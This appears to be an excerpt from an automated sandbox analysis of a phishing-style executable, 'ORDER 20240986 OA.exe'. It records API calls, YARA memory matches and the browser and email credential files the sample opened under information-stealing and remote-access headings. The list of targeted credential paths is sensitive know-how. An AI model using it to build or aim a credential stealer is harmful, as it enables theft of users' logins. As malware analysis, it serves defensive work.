Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040336C
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ORDER 20240986 OA.exe PID: 7832, type: MEMORYSTR
Source: Yara match File source: 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Yara match File source: 00000004.00000002.2970820723.0000000037CDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ORDER 20240986 OA.exe PID: 7832, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ORDER 20240986 OA.exe PID: 7832, type: MEMORYSTR
Source: Yara match File source: 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY